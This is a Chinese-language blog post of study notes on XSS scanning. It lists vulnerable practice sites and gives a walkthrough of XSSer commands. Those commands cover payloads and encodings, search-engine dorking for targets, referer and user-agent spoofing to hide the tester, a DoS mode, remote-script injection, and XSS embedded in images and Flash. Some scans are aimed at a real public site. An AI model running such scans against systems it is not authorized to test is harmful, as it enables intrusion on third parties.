Xysoul
Xysoul

XSS扫描系统原理

那个broken web application 后续会慢慢研究的。。。先把工作任务完成。。

工作任务1:搜索类似演示网站

http://code.google.com/p/websecurify/wiki/DemoSites

工作任务2:检索XSS自动化扫描工具,开源,了解检测原理

=================================================================

(一 )工作任务1:搜索类似演示网站

示例网站:http://code.google.com/p/websecurify/wiki/DemoSites

Details

The following websites may be used to compare Websecurify with other automated web application security testing tools:

  • http://demo.testfire.net
  • http://testphp.vulnweb.com
  • http://testasp.vulnweb.com
  • http://testaspnet.vulnweb.com
  • http://zero.webappsecurity.com
  • http://crackme.cenzic.com
  • http://www.webscantest.com
Google检索到“猪在笑”总结的这些演示网站

S.No. Vulnerable Application Platform Remark
1 SPI Dynamics (live) ASP 漏扫厂商的缺陷demo站点,想学习还是可以玩的。有新花样最好本地玩吧,除非你是活雷锋。
2 Cenzic (live) PHP 同1
3 Watchfire (live) ASPX 同1
4 Acunetix 1 (live) PHP 同1
5 Acunetix 2 (live) ASP 同1
6 Acunetix 3 (live) ASP.Net 同1
7 PCTechtips Challenge (live) online hack challenge, just for fun
8 Damn Vulnerable Web Application PHP/MySQL 有提供Live CD版,适合懒人
9 Mutillidae PHP 针对OWASP的Top 10名单设置针对性的缺陷供你耍,必须推荐
10 The Butterfly Security Project PHP  
11 Hacme Casino Ruby on Rails Hacme系列is copyright by McAfee, but toooooooooooold! take it as you will and at your own risk.
12 Hacme Bank 2.0 ASP.NET (2.0) 同上,不解释。
13 Updated HackmeBank ASP.NET (2.0) 链接失效?我没用过。
14 Hacme Books J2EE 还是Hacme。。。
15 Hacme Travel C++ (application client-server) 又是Hacme。。。不过这个是C++的,比较少见。也许有价值,我没用过
16 Hacme Shipping ColdFusion MX 7, MySQL ColdFusion平台的,有针对性的可以搭建一下试试,我没用过
17 OWASP WebGoat JAVA 适合教学
18 OWASP Vicnum PHP, Perl  
19 OWASP InsecureWebApp JAVA  
20 OWASP SiteGenerator ASP.NET  
21 Moth  
22 Stanford SecuriBench JAVA  
23 SecuriBench Micro JAVA  
24 BadStore Perl(CGI)  
25 WebMaven/Buggy Bank (very old)    
26 EnigmaGroup (live)    
27 XSS Encoding Skillsx5s (Casaba Watcher)   Fiddler的扩展,辅助XSS漏洞挖掘(多种字符编码转换支持)
28 Google Gruyere(live) (previously Jarlsberg)   可以在线玩,GAE supported. So, if you are in CH1N4, you may need a VPN or proxy to access it.
29 Exploit- DB Multi-platform 最真实的Web App漏洞资料库,totally damn real!看上哪个,直接官网下载对应缺陷版本,本地想怎么玩就怎么玩。
30 exploit-kb-vulnerable-web-app PHP/MySQL 文档清晰,易部署,有Vmware Image版,适合懒人

“猪在笑”推荐几个手工的辅助工具,个人感觉挺好~

Tool Category Remark Similar
paros HTTP代理/HTTP协议调试/spider 最新开源版3.2.13更新于2006年,后续版本已经完全商业化。但工具的易用性、功能在今天来看都是值得推荐的。支持HTTP协议双向数据查看/修改/过滤是其亮点。 burp proxy ,Fiddler, live http headers (Firefox addon),Firebug (Many browsers’ addon)
HackBar 手工SQL注入辅助 方便转码、编码、填充垃圾字符,绕过滤必备
TamperData HTTP请求参数控制 拦截HTTP/HTTPS请求,允许手工修改HTTP请求参数(GET参数、POST字段、cookie等)后再提交
Groundspeed 客户端安全措施半自动化解除 自动检测隐藏表单字段、去除表单验证等,免去自己通过Firebug修改html代码的麻烦
BuiltWith (Chrome扩展) 网站架构自动分析 自动检测和识别当前浏览网站所采用的技术架构,脚本小子的最爱

Google 检索到一份整理好的渗透测试学习资源列表

by http://www.pulog.org/Resources/2242/Pentesting-Vulnerable/

Web Pentesting

Application Name Company/Developer URL
OWASP WebGoat OWASP http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP Vicnum OWASP http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
OWASP InsecureWebApp OWASP http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
Web Security DOJO Maven Security Consulting http://www.mavensecurity.com/web_security_dojo/
Gruyere (antigo Codelab / Jalsberg) Google http://google-gruyere.appspot.com/
Hacme Game NTNU http://hacmegame.org/
SPI Dynamics SPI Dynamics http://zero.webappsecurity.com/
Acunetix 1 Acunetix http://testphp.vulnweb.com/
Acunetix 2 Acunetix http://testasp.vulnweb.com/
Acunetix 3 Acunetix http://testaspnet.vulnweb.com/
PCTechtips Challenge PC Tech Tips http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
Damn Vulnerable Web Application DVWA http://dvwa.co.uk/
Mutillidae Iron Geek http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
The Butterfly Security Project The Butterfly Security http://sourceforge.net/projects/thebutterflytmp/
Hacme Casino McAfee http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Hacme Bank 2.0 McAfee http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Updated HackmeBank McAfee http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
Hacme Books McAfee http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Hacme Travel McAfee http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
Hacme Shipping McAfee http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Moth Bonsai Sec http://www.bonsai-sec.com/en/research/moth.php
Stanford SecuriBench Standford http://suif.stanford.edu/%7Elivshits/securibench/
SecuriBench Micro Standford http://suif.stanford.edu/%7Elivshits/work/securibench-micro/
BadStore BadStore http://www.badstore.net/
WebMaven/Buggy Bank Maven Security http://www.mavensecurity.com/webmaven
EnigmaGroup Enigma Group http://enigmagroup.org/
XSS Encoding Skills – x5s (Casaba Watcher) X5S http://www.nottrusted.com/x5s/
Exploit- DB Exploit DB http://www.exploit-db.com/webapps
The Bodgeit Store The Bodgeit Store http://code.google.com/p/bodgeit/
LampSecurity MadIrish http://sourceforge.net/projects/lampsecurity/
hackxor Hackxor http://hackxor.sourceforge.net/cgi-bin/index.pl
WackoPicko WackoPicko

https://github.com/adamdoupe/WackoPicko
RSnake’s Vulnerability Lab RSnake http://ha.ckers.org/weird/

 

War Games

Application Name Company / Developer URL
Hell Bound Hackers Hell Bound Hackers http://hellboundhackers.org/
Vulnerability Assessment Kevin Orrey http://www.vulnerabilityassessment.co.uk/
Smash the Stack Smash the Stack http://www.smashthestack.org/
Over the Wire Over the Wire http://www.overthewire.org/wargames/
Hack This Site Hack This Site http://www.hackthissite.org/
Hacking Lab Hacking Lab https://www.hacking-lab.com/
We Chall We Chall https://www.wechall.net/
REMnux REMnux http://zeltser.com/remnux/

 

Insecure Distributions

Application Name Company / Developer URL
Damm Vulnerable Linux DVL http://www.damnvulnerablelinux.org/
Metasploitable Offensive Security http://blog.metasploit.com/2010/05/introducing-metasploitable.html
de-ICE Hacker Junkie http://www.de-ice.net/
Moth Bonsai SecuritySoftware http://www.bonsai-sec.com/en/research/moth.php
PwnOS Niel Dickson http://www.neildickson.com/os/
Holynix Pynstrom http://pynstrom.net/holynix.php

(二)工作任务2:XSS自动化扫描器系统原理

1.Google到一个关于xss的扫描器,sourceforge的xsser,以下是它的简介:

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
大概就是说它是个自动扫描利用漏洞并且报告之的东东,和我要找的符合。
下载地址:http://sourceforge.net/projects/xsser/files/latest/download
源码checkout地址:svn://svn.code.sf.net/p/xsser/code
这个是XSSer的用法:http://blog.csdn.net/xihuanqiqi/article/details/8072323

2.Google把自己的内部审计XSS的工具开源了 ratproxy

 Google 推出一套免費的 Web 安全評估工具,叫做 RatProxy,這套工具可以檢測、分析您的網站是否有安全性漏洞或網頁是否有被入侵,目前可支援 Linux, FreeBSD, MacOS X, 與 Windows (Cygwin) 等執行環境(反正就是 Unix-like 的環境啦)。
RatProxy 可偵測到的漏洞包括 Cross-site Scripting (XSS, 跨網站指令碼)、指令碼惡意置入(script inclusion issues), 惡意網頁內容(content serving problems), insufficient XSRF 以及 XSS 防護(XSS defenses) 等。
ratproxy地址:http://code.google.com/p/ratproxy/#ratproxy

以下是Google到的Ratproxy用法:
Ratproxy 工作流程:
  • 1) 运行脚本后,会在本地启动一个代理服务器,默认端口是 8080 ;
  • 2) 浏览器设置这个地址 ([url]http://localhost:8080[/url])为 代理地址 ;
  • 3) 浏览要测试的 Web 页面,进行实际登录,填写表单等操作(这些动作会被代理服务器捕捉并做点"手脚"发给待检测的页面),ratproxy 会在后台记录相关的 Log ;
  • 4) 用 ratproxy 提供的工具解析 Log 并输出 HTML 进行分析;
  • 5) 修正比较严重的问题后,跳回到第一步,直到评估通过为止。
在我的 Ubuntu 下测试了一下,需要说一下的是,本地系统需要安装 libssl-dev 与 openssl 。
 
$ sudo apt-get install libssl-dev openssl 
$ cd ratproxy ;  make
然后就可以提交类似: 
$ ./ratproxy -v . -w foo.log -d foo.com -lfscm

3.Google 到 XSSDetect 是一款微软公司为开发人员提供针对跨站脚本攻击的静态分析工具

XSSDetect是精简版的.NET代码分析工具,原本供微软内部人员寻找应用软件的安全漏洞之用,大概是受开源思想影响,现在已经可以免费下载了。
下载地址:http://tel1.hackol.com/2010/hackol.com-4910-XSSDetectSetup.rar
下完就能傻瓜化安装了
这是XSSDetect的用法:

Sample Usage

  1. Launch Visual Studio
  2. Open a solution containing at least on C#, J# or VB.NET project
  3. Build the solution
  4. Click on Tools | XSSDetect Code Analysis, the Summary View dockable tool window activates
  5. Verify/edit the current settings (click on General Settings, Rules or Target Assemblies on the toolbar of the Summary View)
  6. Start the code analysis (use the Analyze button on the toolbar)
  7. After the analysis is complete, the Summary View tool window shows the results, and the output window shows information and error messages
  8. Double click on a result item in the Summary View to activate the Detail View
  9. In the Detail View, double click on a dataflow item to display the corresponding source line
  10. Use the "Previous" and "Next" buttons in the Detail View to display other result items 
看到这个Launch Visual Studio就知道这个要用VS啦,挺麻烦的说。。。
看了下资料,发现这个XSSer的资料多一些,还是中文版的,就研究它了。

(三)研究XSSer系统运行原理

1.先在虚拟机上安装好相关软件如Ihttp://xsser.sourceforge.net/所说的:
Installation

XSSer runs on many platforms. It requires Python and the following libraries:


- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library


On Debian-based systems (ex: Ubuntu), run:


sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip 

Ps:如果有些安装不了,那是因为有些软件包需要升级。具体怎么升级可以看看:
Ubuntu 更新源 源地址和相关操作

Ubuntu apt-get 详解

 

Ps:如果你下载了XSSer的包,里面有个 /doc/INSTALL,别看了,里面的信息太老了,竟然要用到Python-xml,哎。
2.熟悉用法,看看:  

XSSer(超强XSS攻击利器)使用说明中文版 



VMware安装虚拟机Ubuntu的时候,安装完毕后是命令行模式,得重启后才能进入图形界面。

=======================================================================

XSSer 安装与测试

教程入口: http://xsser.sourceforge.net/

1. Installation 安装python相关组件

XSSer runs on many platforms. It requires Python and the following libraries:

- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library

在Ubuntu下用这个指令就能够安装后所有的要用到python模块:
[plain]  view plain copy
  1. sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip   

2.下载XSSer相应的包并且安装

下载地址:http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download

下载后用以下指令:

安装:

[plain]  view plain copy
  1. tar xzvf xsser-1.6_all.deb.tar.gz  
  2. sudo dpkg -i xsser-1.6_all.deb  

以GTK模式(也就是图形化模式运行)(GTK mode):
[plain]  view plain copy
  1. xsser --gtk --silent   


Ps:当然你也可以SVN check out 源代码:
[plain]  view plain copy
  1. $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser   

3.XSSer语法的掌握 (官网写的是 python xsser.py -u "http://www.baidu.com",我用的xsser -u "http://www.baidu.com",都行)

(1)最简单的注入

[plain]  view plain copy
  1. xsser -u "http://www.baidu.com"  

(2)从文件中读取URL,带有代理和HTTP REFERER的注入

[plain]  view plain copy
  1. xsser -i url.txt  --proxy "http://127.0.0.1:8118" --referer 666.666.666.666  
Ps:HTTP Referer是HTTP header的一部分,浏览器向web服务器发送请求的时候,一般会用到referer,以便告诉web服务器我是从哪个页面过来的,方便web服务器统计。而我们加个--referer 666.666.666.666,实际上是不想被web服务器发现我们从哪里来。其实它应该被写成HTTP Refferer,但是写错的人多了,写标准的货也就将就用HTTP Referer啦。。

(3)使用Cem(Character Encoding Mutations 字符编码基因突变),使用user-agent,设置超时时间,设置线程数

[plain]  view plain copy
  1. xsser -u "http://www.baidu.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"  

Ps1:Cem就是先用Hex编码,再转为Str编码,然后再转为Hex编码!

(first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding)

Ps2:user-agent 也就是用户代理,这个域放置了一些信息如OS版本,CPU类型,浏览器版本,浏览器渲染引擎,浏览器语言,浏览器语言等,可以被web服务器获取,这里我们不想被web服务器获取,所以就设置了下“XSSer!!!”就好啦~~


(4)从文件读取(-i "urls.txt"),装载自己的代码(--payload ' ' ),并且用JS中的Unescape()函数解码(--Une)

[plain]  view plain copy
  1. xsser -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une  
Ps:a+b+c+d得到字符串"getURL("javascript:alert('XSS')")" ,这个函数式Flash的常用函数,用来打开一个链接,无论是远程还是本地,只有满足一下两个条件,才能用这种形式的代码:
[plain]  view plain copy
  1. getURL("javascript:someFunction()")  
1)页面有Flash player 8 以及更高版本中
2)SWF文件或者包含该文件的web页面被包含在本地受信任的沙箱中
满足上述条件就能够用:

[plain]  view plain copy
  1. --payload 'eval(getURL("javascript:alert('XSS!!!')"))'  
思考1:为什么要分成abcd四个部分呢!?然后再合起来?

思考2:--Une为什么要用到这里?Unescape()函数对escape()函数编码过后的字符串进行解码,如果字符串不是编码后的字符串,则会把字符串原封不动的返回。也就是说,字符串被浏览器编码后送到web服务器吗?escape()一般用于脚本向某个页面如a.php这个URL传递参数时编码,可是我用的是XSSer,它在传递参数的时候会编码吗?

这两个问题等我以后深入了解再回来回答。


(5)指定引擎并且从引擎的返回结果作为target URL--XSSer Storm

[plain]  view plain copy
  1. xsser --De "duck" -d "search.php?"  

Ps1: duckduckgo是一个网站,搞搜索引擎的 "duck"。

Ps2:  -d DORK       把搜索结果作为攻击的目标URL ( Process search engine dork results as target urls)
Ps3:  --De=DORK_ENGINE  指定用到的引擎 for dorking 有这么多:(bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, google, etc.)
                    

(6)指定抓取URL的深度和数量

    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5
    --Cl                Crawl only local target(s) urls (default TRUE)

[plain]  view plain copy
  1. xsser -c 3 --Cw=4 -u "http://www.baidu.com"  

(7)Post数据(Simple injection from URL, using POST, with statistics results)

[plain]  view plain copy
  1. xsser -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s  
Ps :-s, --statistics      show advanced statistics output results
思考:这个-s到底有什么用呢?统计数据?Post数据一般就是把数据封装到表单中然后发到web服务器请求。

回答:这个-s其实和post没关系,就是把数据给统计了:

===========================================================================
[*] Statistic:
===========================================================================
--------------------------------------------------
Test Time Duration:  0:00:05.929196
--------------------------------------------------
Total Connections: 2
-------------------------
200-OK: 1 | 404: 0 | 503: 0 | Others: 1
Connec: 50 %
--------------------------------------------------
Total Payloads: 1
-------------------------
Checker: 0 | Manual: 0 | Auto: 1 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
Total Injections: 1
-------------------------
Failed: 1 | Sucessfull: 0
Accur : 0 %
-------------------------
Total Discovered: 0
-------------------------
Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
False positives: 0 | Vulnerables: 0
-------------------------
Mana: 0
--------------------------------------------------
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)


===========================================================================

(8)Get请求 八进制编码(--Doo) 结果以简短URL形式(--short tinyurl)

[plain]  view plain copy
  1. xsser -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl   
思考:至今还是不知道Get请求和Post请求这些参数如 "bs/?q="要怎么设定的吗?我个人认为如果不知道网站的源代码,根本不知道参数怎么填?那么这个XSSer的参数是猜测的吗?


(9)Shadow DOM XSS攻击,跨站Cookie注入,最终代码FinalRemote(--Fr)

[plain]  view plain copy
  1. xsser -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"  
Ps1:    --Coo       跨站Cookie注入        COO - Cross Site Scripting Cookie injection 

Ps2:DOM XSS 攻击原理

Ps3:DOM shadow space (no server logging!) 这个DOM阴影空间貌似在哪里听过?可是就是找不到相关资料。。。终于google到了这篇文章,它讲的是Shadow DOM

什么是Shadow Dom?可能会给你带来点帮助。。。


(10) Dos(拒绝服务攻击)   网址压缩is.gd

[plain]  view plain copy
  1. xsser -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"  

Ps:根据官方介绍,Is.gd 至今已处理了近 900 万个网址。首页非常简洁,输入需要压缩的网址提交即可。生成缩略网址后系统会计算压缩前后的字符串长度,并给出压缩率。
如果想要让用户预览网页,而不是直接发送缩略网址(有助于用户了解所链接到的网址,防止被钓鱼),只需在缩略网址后添加连接字符 “-” 来开启网页预览功能。
例如,芒果的网址 http://www.mangguo.org 经过压缩后为 http://is.gd/Aqdn,网页预览地址为 http://is.gd/Aqdn-。
注意:缩略网址 URL 中字母区分大小写。

XSSer结果会多了这么一行:

[plain]  view plain copy
  1. [/] Shortered URL (Injection): http://is.gd/eAxg3x  

(11) 在这些地方注入参数变量: HTTP USer-Agent,HTTP Referer ,  Cookie parameters

[plain]  view plain copy
  1. xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"  

Ps1:   --Xsa               XSA - Cross Site Agent Scripting

Ps2:   --Xsr               XSR - Cross Site Referer Scripting


(12)  创建一个假的XSS代码嵌入图像(create a false image with XSS code embedded)

[plain]  view plain copy
  1. xsser --imx "test.png" --payload "!enter your malicious injection code here!"   
思考:至今还是不会在这个恶意代码里面写点东西,到底要写什么好呢?
回答:这个 可以吗?结果成功~
[plain]  view plain copy
  1. xsser --imx "test.jpg" --payload ""  

(13)把积极的结果输出到指定的XML文件中(Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file).

[plain]  view plain copy
  1. xsser -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"   
Ps: --xml 指定一个XML文件,用来存放输出的”积极“结果,我猜测这个”积极“就是可能能够注入的结果URL
结果一打开xml文件,发现还真的是和我的猜想一致!我真的是神意识啊!~~


(14)把我们的扫描结果上传到某些网站上(twitter)这个功能真的是有爱啊~,不吐槽了。。

[plain]  view plain copy
  1. xsser -d "login.php" --De "duck" --tweet  
示例网站:
-   http://identi.ca/xsserbot01 
-  http://twitter.com/xsserbot01

(15)创建一个swf电影注入XSS代码(Create a .swf movie with XSS code injected)

这个和那个图片的嵌入恶意代码差不多
[plain]  view plain copy
  1. xsser --fla "name_of_file.swf" --payload ""  

(16) 发送一个hash值,预先看看目标URL是否重复全部内容(send an unique hash, without vectors, to pre-check if target(s) repeats all content recieved)

[plain]  view plain copy
  1. xsser -u "http://www.baidu.com" --hash  
结果是:
[plain]  view plain copy
  1. Checker: looks like your target(s) does not repeat all received code.  
Ps:这句话很好懂哦: send an unique hash, without vectors, to pre-check if target(s) repeats all content recieved
思考:这个hash它是怎么去pre-check呢?如果要确认是否重复,首先我的有这个网页的URL的hash,然后我发给它,那么这个hash哪里来呢?难道是有文件存储着?第一次的话没有hash怎么办?
回答:不懂~真心不懂~等以后的我深入了解了再研究吧~

(17) Data Control Protocal(DCP) 数据控制协议 注入,这个好偏门的感觉

[plain]  view plain copy
  1. xsser -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"  



(18)META标签中的Base64编码(RFC2397),也是很偏门的感觉

[plain]  view plain copy
  1. xsser -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64  
这个Base64编码:
[plain]  view plain copy
  1. --B64               B64    - Base64 code encoding in META tag (rfc2397)  

(19)启动浏览器,结束时发现的每个XSS(launch a browser at the end with each XSS discovered)

[plain]  view plain copy
  1. xsser -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch  
思考:都越来越不知道什么意思了。。。
直接贴英文吧:
[plain]  view plain copy
  1. Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly  


你可能感兴趣的:(工具使用)

  • 大模型【进阶】(四)QWen模型架构的解读 ReinaXue 人工智能transformer语言模型迁移学习AudioLM语音识别神经网络
    一、Qwen大模型的背景Qwen(通义千问)是阿里巴巴云开发的大型语言模型(LLM)和多模态模型系列,旨在提供强大的自然语言理解、文本生成、图像理解、音频处理及工具使用能力。Qwen系列包括Qwen、Qwen1.5、Qwen2、Qwen2.5和Qwen3等版本,涵盖了从小型(0.5B参数)到超大型(480B参数)的模型规模,支持多语言(119种语言)和多模态任务(文本、图像、音频、视频)。本文将重
  • 使用sealos进行k8s集群部署和sealos集群部署失败 七七powerful centoslinux运维
    下载Sealos命令行工具使用RPM源进行安装查看操作系统版本[root@master01~]#uname-aLinuxmaster014.18.0-553.52.1.0.1.an8.x86_64#1SMPThuMay1515:49:42CST2025x86_64x86_64x86_64GNU/Linux[root@master01~]#cat/etc/os-releaseNAME="Anolis
  • 算法重构:从O(n²)到O(n log n)的性能飞跃 止观止 C++算法重构c++
    引言在软件开发中,算法性能优化是提升系统响应速度和资源利用率的关键手段。本文将深入探讨如何通过算法重构将时间复杂度从O(n²)优化到O(nlogn),这种优化在实际生产环境中可能意味着系统从不可用到高性能的转变。通过本文,读者将学习到:如何识别代码中的算法瓶颈使用STL算法库优化常见操作分治策略(DivideandConquer)的实际应用性能测试方法论与工具使用CPU缓存命中率对算法性能的影响本
  • npm init vite-app runoob-vue3-test2 ,npm init vue@latest,指令区别 CATTLECODE npmvue.js前端
    这两个命令都是用于创建Vue.js项目的脚手架命令,但它们在技术栈、配置方式和项目结构上有显著区别:1.npminitvite-apprunoob-vue3-test2技术栈:基于Vite构建工具使用Vue3作为默认框架由Vite团队维护特点:bash复制代码npminitvite-app快速创建:零配置启动,没有交互选项文件结构:复制代码├──node_modules├──index.html├
  • Linux操作系统的自动化部署工具选型 操作系统内核探秘 linux自动化运维ai
    Linux操作系统的自动化部署工具选型关键词:自动化部署、Linux运维、工具选型、基础设施即代码、配置管理摘要:本文从"为什么需要自动化部署"出发,通过生活场景类比解析核心概念,对比主流工具(Ansible/Puppet/Chef/SaltStack/Terraform)的技术特性,结合团队规模、业务复杂度等实际因素总结选型策略,并提供实战案例演示工具使用。无论你是运维新手还是技术负责人,都能通
  • 嵌入式 Linux 开发:从系统裁剪到驱动开发
    本文聚焦嵌入式Linux开发,全面阐述从系统裁剪至驱动开发的完整流程。开篇介绍嵌入式Linux开发的背景与重要性,接着深入探讨系统裁剪,涵盖原因、方法(如配置选项、模块化设计等)及图形裁剪工具使用。随后详细讲解驱动开发,包括Linux嵌入式驱动优势、关键技术(硬件抽象层、设备树、中断处理等)与开发步骤。同时结合实例说明各环节操作,旨在为开发者提供嵌入式Linux开发的系统指导,助力打造高效稳定的嵌
  • AI工程师必备:AI原生应用开发的系统思维框架 AI天才研究院 AgenticAI实战AI大模型企业级应用开发实战AI人工智能与大数据人工智能AI-nativeai
    AI工程师必备:AI原生应用开发的系统思维框架副标题:从工具使用者到架构师的思维跃迁关键词AI原生应用,系统思维框架,AI应用架构,机器学习工程,提示工程,向量数据库,LLMOps摘要在生成式AI爆发的时代,AI应用开发正经历从"AI作为附加功能"到"AI作为核心引擎"的范式转变。本文提出了一套完整的"AI原生应用开发系统思维框架",旨在帮助AI工程师超越工具使用层面,建立系统化、结构化的思维模式
  • 智能Agent场景实战指南 Day 19:Agent工具使用与API调用 在未来等你 智能Agent场景实战指南AIAgentAPI集成工具调用LangChain智能助手
    【智能Agent场景实战指南Day19】Agent工具使用与API调用开篇欢迎来到"智能Agent场景实战指南"系列的第19天!今天我们将深入探讨Agent工具使用与API调用的核心技术。在现代智能Agent系统中,工具调用和API集成能力是决定Agent实用性和扩展性的关键因素。通过本篇文章,您将掌握如何为Agent配备各种工具能力,实现与外部系统的无缝对接,从而大幅扩展Agent的应用边界。场
  • Node-RED低代码流式编程工具使用简介 handsomestWei 后端低代码Node-RED物联网IOT
    Node-RED低代码流式编程工具使用简介全文链接:低代码流式编程工具node-red使用简介工具概述Node-RED是一个基于流的编程工具,专门用于连接物联网设备、API和在线服务。它提供了基于浏览器的可视化编辑器,用户可以通过拖拽节点的方式创建复杂的逻辑流程,无需编写大量代码。核心特点可视化编程通过拖拽节点和连线构建应用程序无需深入了解底层函数逻辑实时调试和数据流监控大幅降低开发门槛丰富的生态
  • 深度揭秘端口映射:原理场景、故障分析与实操工具使用,小白也能简单操作实现外网访问内网
    端口映射:网络通信的关键技术,在网络通信领域,端口映射是一项至关重要的技术。在内部网络环境中,每一台设备都被分配了唯一的IP地址和端口号,这些标识用于在网络中精准定位和识别各个设备。然而,公共互联网的IP地址资源十分有限,不同设备可能会共享同一个公网IP地址。当需要实现内部设备的远程访问,或者搭建局域网服务器以供外部访问时,端口映射就成为了连接内外网络的关键桥梁。一、端口映射的常见应用场景1、远程
  • Apache Ignite SQLLine工具使用指南 侯霆垣
    ApacheIgniteSQLLine工具使用指南概述ApacheIgnite作为一个分布式内存计算平台,提供了完整的SQL功能支持。SQLLine是Ignite内置的一个命令行工具,它允许开发者和数据库管理员通过交互式方式执行SQL查询和管理Ignite集群。本文将详细介绍如何使用SQLLine工具与Ignite集群进行交互。SQLLine工具简介SQLLine是一个基于控制台的JDBC客户端工
  • 如何高效Bug跟踪与管理方法 海姐软件测试 缺陷管理bug
    在软件测试过程中,Bug的跟踪与管理直接影响项目质量和团队协作效率。结合多年测试经验,我总结了一套完整的Bug管理流程,涵盖工具使用、团队协作和优化策略。1.Bug管理核心流程(1)Bug提交阶段标准化缺陷报告(参考我上一篇回答:缺陷报告应包含哪些内容?)工具选择:Jira(适合敏捷团队,支持自定义工作流)禅道(国产开源,适合中小团队)Bugzilla(传统但稳定,适合C/S架构项目)(2)Bug
  • 易效能一阶 G188期的90天践行正式开始 任旻
    G188期是我参加第二次复训的班级,第一次参加的是G151,2017年的三八节在成都开启了真正的易效能系统的学习和践行。第一次复训是G169重庆班,这次也是重庆班,与前两次有很多不同的地方:1.强大的教练团队支持,有每年读书300本的教练带班,有全球工具使用最牛的教练,有易效能系统的学习部部长带教练团队的教练等等。全班来了二三十位教练。2.课程内容的升级,两天全是满满干活,get到不少的新知识,在
  • 零基础学习性能测试第一章-性能测试和功能测试的区别 试着 性能测试学习功能测试性能测试零基础
    目录零基础学习性能测试:性能测试与功能测试的核心区别一、核心概念对比(本质区别)1.测试目标差异2.测试方法对比3.工作流程差异二、实际工作场景应用指南1.何时使用功能测试?(适用场景)2.何时使用性能测试?(关键场景)3.协同应用模式三、工具链对比与实践1.工具选择矩阵2.工具使用对比(以用户登录为例)3.报告输出差异四、工作场景决策树决策指南:五、协同工作最佳实践1.项目各阶段配合2.协作工作
  • LLM Agent在多模态任务中的推理机制详解
    文章目录一、引言二、多模态LLMAgent的基本架构2.1系统组成2.2工作流程图三、多模态表示与对齐3.1跨模态嵌入空间3.2模态对齐技术四、多模态推理策略4.1基于提示的推理(Prompt-basedReasoning)4.2多模态思维链(CoT)推理4.3多模态工具使用五、实现案例:多模态问答系统5.1系统架构5.2示例应用六、高级多模态推理技术6.1多模态递归推理6.2多模态记忆与检索6.
  • 海思平台ISP系列从零开始:一、PQTools工具的使用总结 斟茶兵 海思平台基础的Imagesensor问题分析isp嵌入式
    海思平台ISP系列:一.PQTools工具使用方法正所谓工欲善其事必先利其器,磨刀不误砍柴工,想要在海思平台开始IQ,就得利用海思SDK中提供的PQTools工具,这个工具作的很好的,里边有很多图像分析的工具,下面就开始介绍:工具入式如何使用:在海思的SDK开发包中,包含了PQTools使用的软件,以我使用的Hi33516DV300为例,PQTools工具包的目录如下:Hi3516CV500R00
  • Oracle 数据库管理与维护实战指南(用户权限、备份恢复、性能调优) 白仑色 Oracle系列数据库oracle数据库管理性能调优备份恢复
    关键词:Oracle用户权限管理、冷热备份、RMAN备份、AWR报告、SQL调优、等待事件分析✅摘要在企业级Oracle数据库运维中,用户权限管理、数据备份恢复机制、性能监控与调优是保障系统安全、稳定和高效运行的三大核心任务。本文将围绕以下内容进行详细讲解:用户与权限管理:创建用户、角色、授权与回收权限备份与恢复策略:物理备份(冷/热)、逻辑备份(EXP/IMP)、RMAN工具使用性能监控与调优:
  • 快速启动静态网络服务器的Run工具使用指南 闫泽华
    本文还有配套的精品资源,点击获取简介:本文介绍了如何使用run工具,一个通过npm全局安装的Node.js包,来启动一个简单的静态文件服务器。介绍了npm的作用,以及如何全局安装run。随后,文章解释了run工具的用途,包括从任何目录快速启动静态网站服务器的能力,并讨论了它在开发、测试和演示中的应用。还涉及了使用run工具时涉及的一些基本任务,如处理HTTP请求和返回静态资源,以及提供了源代码文件
  • RBDMuteSwitch:一键静音控制工具使用指南 幸生朋Margot
